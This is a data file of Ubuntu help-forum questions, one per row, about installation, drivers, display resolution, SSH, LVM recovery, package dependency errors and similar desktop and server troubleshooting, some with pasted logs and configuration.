343877	where do i submit applications written for ubuntu touch ?	i 've written an application for ubuntu touch using the ubuntu sdk and have packaged it as a click package . where do i go to submit it to the app store to make it available for installation in ubuntu touch ?
343879	server program upgrade problems	i am running 12.04lts and the system tells me that there are packages to be updated . the next commands are working : sudo apt-get update sudo apt-get upgrade one or more of the programs/packages that it is updating hangs the system i have to turn it off to have it come back up . is there a way to determine which packages need upgrading and can i update one package at a time until i determine which one fails and hangs the system ? or do you guys have another route of diagnosis ?
343880	local network install ubuntu desktop 12.04lts 64bits	i have an all in one pc without cdrom , and the usb ports are not working properly . im trying to perform a network installation via netboot/pxe , but it seems to be pretty difficult . i did n't have so many troubles with other distributions with the same procedure . question : does the installation cd work as network repo via http or should i download something else ? does anybody know where to find accurate documentation ? thank you all in advance . german
343885	vsftp , apache setup	i am new to linux , but got my hand on an ubuntu machine , i install apache2 and vsftpd after following some tutorial . with apache i got my wordpress running , and ftp works fine too . now i face a problem that i am not sure how to resolve . the problem is when i try to activate the permalink it does n't activate as it can not write to the .htaccess file . similarly wp-cache plugin fails to create cache folder or write to the .htaccess file as needed . so i opted to give 777 permission to my wp-content folder and as soon as i do that , it simply disables all my plugins saying no file exists for plugin . please suggest what should i do to fix this problem ? edit : i fix it by making www-data as user for vsftpd as well , so i got common user to run apache and vsftpd . this solve problem as now i do n't have to create different groups or permissions .
343889	creating a launcher entry about an app in home directory which needs `` gtk2_rc_files '' to run	i have installed ( extracted ) adt ( android developer tools ) at my home directory and i want to have a launcher icon for it . reason for this : i have the problem with the dark tooltips at eclipse and i 'm trying the fix described here so i need to run eclipse with gtk2_rc_files=~/.gtkrc-eclipse everytime . ( also , i am using medditeraneandark theme if that 's needed as info . ) this is what i have created and works : [ desktop entry ] name=adt exec=/home/chris/adt-bundle-linux-x86_64-20130522/eclipse/eclipse icon=/home/chris/adt-bundle-linux-x86_64-20130522/eclipse/plugins/com.android.ide.eclipse.adt.package_22.0.1.v201305230001 -- 685705/icons/adt.png type=application but now i need to run adt like this : gtk2_rc_files=~/.gtkrc-eclipse /home/chris/adt-bundle-linux-x86_64-20130522/eclipse/eclipse i 've tried these : exec=gtk2_rc_files=~/.gtkrc-eclipse /home/chris/adt-bundle-linux-x86_64-20130522/eclipse/eclipse exec= '' gtk2_rc_files=~/.gtkrc-eclipse /home/chris/adt-bundle-linux-x86_64-20130522/eclipse/eclipse '' but none seemed to work . how can i achieve this ?
343890	how to set up ubuntu partition	i have experimented with wubi for a few years now and i 've finally gotten the hang of it . i am comfortable enough with linux rarely if ever refer to my windows programs . my laptop has 500 gb and only 32 gb are allocated towards wubi . what are my options for setting up my laptop with ubuntu with even more space i 'd like to have a dual partition with 300gb ubuntu and the rest windows .
343896	gnome : i can not use the screensaver key for a custom command	i wanted to reassign the fn + f2 ( screensaver ) keyboard shortcut to use a custom shortcut with it . i got the warning that this will disable the default keyboard shortcut to lock the screen . however , my custom command is not executed when pressing fn + f2 . instead nothing happens . here are my settings :
343897	installing mozart or other software with wine	from very new user of ubuntu , with wine installed too . i have `` mozart '' music notation software , on a cd . i know others use it with wine . i know it would install on windows ok , but do i just stick it in my newly all-ubuntu machine to install here , or do i need to do more to tell it to work with wine ? if so , what , and where , please ? please bear in mind my complete lack of jargon in reply ! thanks .
343898	ubuntu - resolution errors ?	my current installation of ubuntu is running on 1024x768 , however my monitor 's optimal res . is 1366x768 which is successfully attained on the dual boot windows xp . so i tried a plethora of ways to try and gain the 1366 resolution , mainly with xrandr and ran into a huge load of troubles following several guides from several websites . currently my xrandr looks like this : xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1368 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0* 800x600 0.0 640x480 0.0 1366x768 59.9 1368x768_60.00 ( 0x18a ) 85.2mhz h : width 1368 start 1440 end 1576 total 1784 skew 0 clock 47.8khz v : height 768 start 771 end 781 total 798 clock 59.9hz 1366x768_60.00 ( 0x18d ) 85.2mhz h : width 1368 start 1440 end 1576 total 1784 skew 0 clock 47.8khz v : height 768 start 771 end 781 total 798 clock 59.9hz any even though it says 1366x768 , when i try to set it runs my into a error , when i try to set it up via display gui it says maximum is 1024x768 this is when i get when i use xrandr-s aayush @ aayush-desktop : /var/www $ xrandr -s 1366x768 size 1366x768 not found in available modes i highly appreciate any help in the matter
343901	where do i put this code to install absynth 5 ?	i want to install absynth 5 on my computer . i found this code , here it is . # ! /bin/bash # date : ( 2013-02-01 ) # last revision : ( 2013-02-01 ) # distribution used to test : kubuntu 12.04 lts # author : djyoshabyd # licence : gplv3 # playonlinux : 4.1.9 # changelog # [ superplumus ] ( 2013-06-17 19-35 ) # update gettext message [ `` $ playonlinux '' = `` '' ] & & exit 0 source `` $ playonlinux/lib/sources '' prefix= '' absynth5 '' wineversion= '' 1.3.0 '' title= '' absynth 5 '' editor= '' native instruments '' game_url= '' http : //www.native-instruments.com '' author= '' djyoshabyd '' # initialization pol_getsetupimages `` http : //files.playonlinux.com/resources/setups/ $ prefix/top.jpg '' `` http : //files.playonlinux.com/resources/setups/ $ prefix/left.jpg '' `` $ title '' pol_setupwindow_init pol_debug_init # presentation pol_setupwindow_presentation `` $ title '' `` $ editor '' `` $ game_url '' `` $ author '' `` $ prefix '' # create prefix pol_setupwindow_browse `` $ ( eval_gettext 'please select the setup file to run ' ) '' `` $ title '' pol_system_setarch `` x86 '' pol_wine_selectprefix `` $ prefix '' pol_wine_prefixcreate `` $ wineversion '' # dependencies # configuration set_os `` winxp '' set_sounddriver `` alsa '' # installation pol_wine_waitbefore `` $ title '' gc_dont_gc=1 pol_wine `` $ app_answer '' pol_wine_waitexit `` $ title '' # create shortcuts pol_shortcut `` absynth\ 5.exe '' `` $ title '' pol_setupwindow_message `` $ ( eval_gettext 'notice : for low-latency audio , look into wineasio . ' ) '' `` $ title '' pol_setupwindow_close exit 0 but i think it is supposed to go somewhere other than the terminal because in the terminal after typing # ! /bin/bash i still get a $ sign . thank you in advance for all of your help .
343905	how to sanitize logs in ubuntu ?	how to filter system logs ( like /var/log/syslog ) so that they not contain sensitive data and can be safely used to analyze system problems ( crashes etc . ) ?
343906	wifi led changes between orange and blue . does that denote a problem ?	i have recently installed the ubuntu 13.04 64 bit dual boot with windows 7 on hp elitebook 8440p laptop . my wifi is working fine , the only thing i noticed is the wifi signal toggling between orange and blue is this behaviour normal ?
343910	where to find xen/common/schedule.c	i have installed xen and its working and i have made domu also . but i need to make changes in scheduler of xen and thats why i need to find xen/common/schedule.c . in my friend 's computer if he is writing on dashboard he is able to find on desktop . i dont know where it is in my computer . i have made the files unhidden also or maybe it is in any folder i dont know . i also need to find root/xen-4.0-testing.hg but same problem persists . please help to find these files
343911	fn keys do not work while playing games in full screen	when i play a game such as openarena , assaultcube or openttd , i can not use fn keys such as to decrease/increase volume . the only possibility to use is playing in window mode . how can i enable those keys in fullscreen mode as well ?
343913	lvm recovery after dd mistake	i have two disk in a volume set using lvm , the filesystem on these stopped working . my plan was to duplicate the disks onto two need disks before i attempt to recover data as i suspect that one of the disks might be dodgy . unfortunately i did not properly check my drive allocations before i ran ddrescue and ended up copying the first 800mb of data from the first disk to the second disk in the volume set . before ubuntu picked up the volume set even though i was unable to mount the partition . now it no longer detects the drives as being in the same volume set . from what iâve read this is because the lvm header for each disk is stored in the beginning of each drive . i donât know much about lvm can somebody point me in the right direction for trying to re-establish the volume set ? is there a way to tell the recreate the lvm headers on the second disk ? thank you
343914	setfecl : option -m incomplete , why ?	my commands : sudo setfacl -r -m u : www-data : rwx -m u : `whoami` : rwx app/cache app/logs sudo setfacl -dr -m u : www-data : rwx -m u : `whoami` : rwx app/cache app/logs it returns : setfecl : option -m incomplete i was trying to google this issue , but i found nothing .
343916	i want to run ubuntu on my dell inspiron 1464 .	i do not know code at all and am unsure how to even uninstall my present software but i have used ubuntu before and liked it . my ex was a techy . my dell is saving everything to the operating system and nothing on the hard drive and i lost the software that came with it . i was thinking i could have it fixed and rebooted and go with linux . this was i can work on learning some modeling programs for my art without paying an arm and a leg . can anyone tell me how to get started . i have looked up and my computer is not dell certified . i am lost to all of this .
343918	hp slim bluetooth keyboard connection failed	i just got the hewlett packard slim bluetooth keyboard ( kt-1281 ) and a corresponding hp bt mouse . while the mouse is quickly connected and works smoothly on ubuntu 12.04 , the keyboard is detected , but establishing the connection always fails . for installing i use the bluetooth manager in system settings , so no terminal . my question is , if you have experienced the same or a similar problem and maybe found a solution . or do you know another way for installing a bluetooth device ? or do you think it would be better to send the keyboard back ? can you recommend a bt keyboard with no numpad and no apple assignment of keys ? thank for your help !
343926	ubuntu 13.04 runs very slow after update from xorg-edgers ppa	ubuntu ver - 13-04 32bit . kernel ver - 3.8.0-30-generic computer specs - pentium iv ( 2.80ghz ă 2 ) with build in graphics using an intel 915g . after getting the latest drivers from xorg-edgers ppa the response time and performance in unity and ubuntu altogether is very slow . i need help because this update from xorg-edgers is key for me to run wine http : //bugs.winehq.org/show_bug.cgi ? id=34238
343929	what can i do to extend lifetime of my usb using ubuntu full install ?	i 've done a full install of ubuntu onto my 8gb usb stick . what things can i do to extend the lifecycle of my usb stick ? i need it to be the full install , the live versions no good .
343930	ubuntu 13.04 gets blocked while running virtualbox	i have a fresh installed ubuntu 13.04 and trying to run two virtual maschines on it . it runs for a while and then it gets stuck host and guest ( dont respond to ping or ssh ) . but it doesnt restart . i have to reboot the maschine . syslog doesnt show any sign of error . i could use some help to track down why it is and how to get rid of it . thanks < cpu count= '' 4 '' hotplug= '' false '' > < hardwarevirtex enabled= '' true '' exclusive= '' true '' / > < hardwarevirtexnestedpaging enabled= '' true '' / > < hardwarevirtexvpid enabled= '' true '' / > < pae enabled= '' true '' / > < hardwarevirtexlargepages enabled= '' false '' / > < hardwarevirtforce enabled= '' false '' / > < /cpu > < memory ramsize= '' 8000 '' pagefusion= '' false '' / > < hid pointing= '' ps2mouse '' keyboard= '' ps2keyboard '' / > < hpet enabled= '' false '' / > < chipset type= '' piix3 '' / > < storagecontroller name= '' ide '' type= '' piix4 '' portcount= '' 2 '' usehostiocache= '' true '' bootable= '' true '' / > < storagecontroller name= '' sata '' type= '' ahci '' portcount= '' 30 '' usehostiocache= '' false '' bootable= '' true '' ide0masteremulationport= '' 0 '' ide0slaveemulationport= '' 1 '' ide1masteremulationport= '' 2 '' ide1slaveemulationport= '' 3 '' > edit : it also have the same behavior with vmware player .
343931	my computer headphone jack doesnt work	i just recently bought a new asus s200e and the headphone jack does n't work when they are plugged in- only my computer speakers . i have tried many options but the headphones icon does not appear in the sound icon at the bottom so i ca n't ''enable it '' .
343934	weird problem in skype in ubuntu 12.04	i can make an audio as well as a video call on skype only if i have initiated the call . but when someone else calls me , as soon as i click the accept button , skype crashes . i 've installed skype4.2 from ubuntu software centre . the problem persists between different systems also ( using ubuntu 12.04. ) . any idea , how to fix ?
343935	bash : ./metasploit-latest-linux-x64-installer.run : can not execute binary file	i am installing tool for testing . but after download tool in folder , i try to install it by root @ user : ~ chmod +x metasploit-latest-linux-x64-installer.run root @ user : ~ ./metasploit-latest-linux-x64-installer.run and output is like : bash : ./metasploit-latest-linux-x64-installer.run : can not execute binary file
343937	i need flash player 11.3.0 or higher	i need to take some online tests for school . this website tells me i need flash player 11.3.0 or higher . as far as i can see that is not yet avaible for linux . i use ubuntu 12.04 lts and chromium . is there a way i can work around it ? greetz . rob .
343946	problem with ubuntu instalation	well , i will try to describe my problem minutely : i installed ubuntu 12.04 a long time ago , but i did n't do it by booting the pc with the burned dvd , i installed it like a normal aplication , in windows 7 , so windows configured the settings and the dual boot for me . the dual boot worked ok but recently ( because i started using ubuntu more often ) i started to have problems with the swap memory , that was low because windows configured it on the instalation back then . i updated windows 7 to windows 8 , but the dual boot kept working ok , managed by windows 8 . so i wanted to unistall ubuntu and install it again , but doing it the right way ( by booting the pc and partitioning the memory ) . so i unistalled ubuntu at `` add/remove programs '' at the windows control panel . i burned the iso file of ubuntu 12.04 on a dvd and booted the pc with the dvd inside . at the instalation step that i had to partition the memory , i resized the memory used by windows and got 20 gb of free memory , at this free memory block , i wanted to set a new partition at this free memory block , but this option was unavaiable to click on . so i left the instalation , went to windows to check the disk management , and i already have 4 primary partitions : c : , hp_recovery ( e : ) , hp_tools ( f : ) , system . probably if i remove one of the primary partitions , the box `` set new partition '' will be avaiable at ubuntu installation , but i really do n't know if i can remove this primary partitions , do you know wich one of them can be removed without problem ? i have 320gb of memory , but seems like just 300gb is showing at the disk management , i really think that i did n't have any bad block , so could it be the memory of my old ubuntu instalation and i unistalled it the wrong way so the memory is missing ? do you know some program that can check it out for me ? thanks , and sorry for bad english . = )
343950	lubuntu root size	i am going to install lubuntu 12.04 as dual boot on a 80 gb hdd ( after win 7 installation 35 gb remained for lubuntu ) . i guess it does make sense to create a swap and root partition in addition to a big home partition ( but i am not very experienced with linux ) . since the space is limited until i 'm able to completely remove windows , i want to assign a reasonable small root partition . for ubuntu i read 8-10gb . what size would you recommend for lubuntu ? with 1gb ram i will create a swap of 1gb and the rest as home .
343951	lpstat in reverse order ?	is it possible to make lpstat output print jobs in reverse order , from newer to older ? currently we see in the output the first sent document , then the second , etc . i have more than 5k jobs and i want to output only the ones new for me , cancelling the cycle once i reach the last job id i printed in screen . thanks a lot !
343961	is there a way to back up tomboy notes ?	i have some class notes and relatively important stuff that i have saved in tomboy notes . i need to wipe my ubuntu 10.10 and install the newest version of ubuntu . i already have a dual-partition windows machine . is there a way for me to copy all of my notes/save them elsewhere before i reinstall the ubuntu operating system ?
343962	ssh connecting issue	so i got a vps and i am trying to ssh into it but i keep getting this denied error permission denied ( publickey , password ) . here is my config file . # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts > rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords # passwordauthentication yes # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes i also did ssh with -vvv here is the output definity @ definity-ms-168b /etc/ssh $ ssh -vvv definity @ 000.000.000.000 openssh_6.0p1 debian-3ubuntu1 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 000.000.000.000 [ 000.000.000.000 ] port 22. debug1 : connection established . debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/definity/.ssh/id_rsa '' as a rsa1 public key debug1 : identity file /home/definity/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/definity/.ssh/id_rsa-cert type -1 debug1 : identity file /home/definity/.ssh/id_dsa type -1 debug1 : identity file /home/definity/.ssh/id_dsa-cert type -1 debug1 : identity file /home/definity/.ssh/id_ecdsa type -1 debug1 : identity file /home/definity/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_6.0p1 debian-3ubuntu1 debug1 : match : openssh_6.0p1 debian-3ubuntu1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.0p1 debian-3ubuntu1 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` 64.188.47.157 '' from file `` /home/definity/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/definity/.ssh/known_hosts:1 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa 6d : ad:7a:97 : d4 : e3 : b4:99:84:3f : c9:02 : b3 : a9:9b:12 debug3 : load_hostkeys : loading entries for host `` 000.000.000.000 '' from file `` /home/definity/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/definity/.ssh/known_hosts:1 debug3 : load_hostkeys : loaded 1 keys debug1 : host '64.188.47.157 ' is known and matches the ecdsa host key . debug1 : found key in /home/definity/.ssh/known_hosts:1 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/definity/.ssh/id_rsa ( 0x7fcb7e880d70 ) debug2 : key : /home/definity/.ssh/id_dsa ( ( nil ) ) debug2 : key : /home/definity/.ssh/id_ecdsa ( ( nil ) ) debug1 : authentications that can continue : publickey , password debug3 : start over , passed a different list publickey , password debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/definity/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/definity/.ssh/id_dsa debug3 : no such identity : /home/definity/.ssh/id_dsa debug1 : trying private key : /home/definity/.ssh/id_ecdsa debug3 : no such identity : /home/definity/.ssh/id_ecdsa debug2 : we did not send a packet , disable method debug3 : authmethod_lookup password debug3 : remaining preferred : , password debug3 : authmethod_is_enabled password debug1 : next authentication method : password definity @ 000.000.000.000 's password : debug3 : packet_send2 : adding 48 ( len 64 padlen 16 extra_pad 64 ) debug2 : we sent a password packet , wait for reply debug1 : authentications that can continue : publickey , password permission denied , please try again . definity @ 000.000.000.000 's password : debug3 : packet_send2 : adding 48 ( len 64 padlen 16 extra_pad 64 ) debug2 : we sent a password packet , wait for reply debug1 : authentications that can continue : publickey , password permission denied , please try again . definity @ 000.000.000.000 's password : debug3 : packet_send2 : adding 48 ( len 64 padlen 16 extra_pad 64 ) debug2 : we sent a password packet , wait for reply debug1 : authentications that can continue : publickey , password debug2 : we did not send a packet , disable method debug1 : no more authentication methods to try . permission denied ( publickey , password ) . i have masked the ip , but i am not sure if it is my end with the problem or their end , i am fairly new to ssh i have changed the password and tried it again , still says same error . can you see why ? thanks
343965	how to get ubuntu 12.04/13.04 working smoothly with nvidia geforce 6150se graphics ?	i have an emachines pc with yes i know crappy onboard nvidia geforce 6150se graphics and both unity and gnome shell run very bad with lagging . the open source nouveau driver just crashes with a `` dri failed to idle '' error . any tips on getting this to work ? i tried all the drivers from the additional drivers tab it does n't matter which version of ubuntu 12.04 or 13.04 just as long as it works . thanks in advance .
343970	bootable version on usb drive	i downloaded the files through this website onto my flashdrive and am wondering how to boot it up ?
343976	installed wrong teamvierer package now i have unmet dependency problems , how to revert back ?	package management is broken after a mistaken attempt to install teamviewer ( i selected the wrong teamviewer package from the teamviewer web site ) . i have tried : sudo apt-get clean sudo apt-get update then if i do : sudo apt-get install -f i get : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : language-pack-kde-en kde-l10n-engb language-pack-kde-en-base use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libsane : i386 suggested packages : hpoj : i386 hplip : i386 libsane-extras : i386 sane-utils : i386 the following new packages will be installed libsane : i386 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/3,554 kb of archives . after this operation , 8,503 kb of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 479536 files and directories currently installed . ) unpacking libsane : i386 ( from ... /libsane_1.0.22-7ubuntu1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libsane_1.0.22-7ubuntu1_i386.deb ( -- unpack ) : './lib/udev/rules.d/40-libsane.rules ' is different from the same file on the system errors were encountered while processing : /var/cache/apt/archives/libsane_1.0.22-7ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) removing the problem package does n't seem to work : sudo apt-get remove libsane : i386 reading package lists ... done building dependency tree reading state information ... done package libsane : i386 is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . ia32-libs-multiarch : i386 : depends : libsane : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . and removing ia32-libs-multiarch : i386 does n't work either : sudo apt-get remove ia32-libs-multiarch : i386 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . ia32-libs : depends : ia32-libs-multiarch e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . ubuntu software center now ca n't be used as it continually gives me an error dialog saying `` items can not be installed or removed until the package catalog is repaired . do you want to repair it now ? '' - however the repair fails as follows : ( reading database ... 479536 files and directories currently installed . ) unpacking libsane : i386 ( from ... /libsane_1.0.22-7ubuntu1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libsane_1.0.22-7ubuntu1_i386.deb ( -- unpack ) : './lib/udev/rules.d/40-libsane.rules ' is different from the same file on the system errors were encountered while processing : /var/cache/apt/archives/libsane_1.0.22-7ubuntu1_i386.deb error in function : dpkg : dependency problems prevent configuration of ia32-libs-multiarch : i386 : ia32-libs-multiarch : i386 depends on libsane ; however : package libsane : i386 is not installed . dpkg : error processing ia32-libs-multiarch : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ia32-libs : ia32-libs depends on ia32-libs-multiarch ; however : package ia32-libs-multiarch is not installed . package ia32-libs-multiarch : i386 is not configured yet . dpkg : error processing ia32-libs ( -- configure ) : dependency problems - leaving unconfigured i also get a notification saying `` an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'error : brokencount > 0 ' . this usually means that your installed packages have unmet dependencies '' . any advice on how to get out of this mess ? thanks very much .
343978	monitor hdmi not working	i can not use the external monitor hdmi . i just installed ubuntu 12.04 and my configuration is as follows : $ > lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf119m [ geforce 610m ] ( rev a1 ) $ > xrandr screen 0 : minimum 8 x 8 , current 1366 x 768 , maximum 16384 x 16384 lvds-0 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 120.1 60.0 960x720 120.0 928x696 120.1 896x672 120.0 960x600 120.0 960x540 120.0 800x600 120.0 60.3 56.2 840x525 120.0 119.8 800x512 120.3 700x525 120.0 640x512 120.0 720x450 119.8 640x480 120.0 59.9 680x384 119.6 119.9 576x432 120.1 512x384 120.0 400x300 120.6 112.7 320x240 120.1 vga-0 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) displayport-0 disconnected ( normal left inverted right x axis y axis ) $ > nvidia-debugdump -d -v -z -l nvmlinit succeeded listing all gpus . found 1 nvidia devices warning : nvmldevicegetserial : not supported device id : 0 device name : geforce 610m device handle : 0x464e1608 gpu internal id : gpu-e367825c-85a8-25b9-94cd-a3c52aaf2785 $ > lshw -c display | grep driver configuration : driver=nvidia latency=0 configuration : driver=i915 latency=0 $ > glxinfo name of display : :0 display : :0 screen : 0 direct rendering : yes server glx vendor string : nvidia corporation server glx version string : 1.4 server glx extensions : glx_ext_visual_info , glx_ext_visual_rating , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgi_video_sync , glx_sgi_swap_control , glx_ext_swap_control , glx_ext_swap_control_tear , glx_ext_texture_from_pixmap , glx_ext_buffer_age , glx_arb_create_context , glx_arb_create_context_profile , glx_ext_create_context_es_profile , glx_ext_create_context_es2_profile , glx_arb_create_context_robustness , glx_arb_multisample 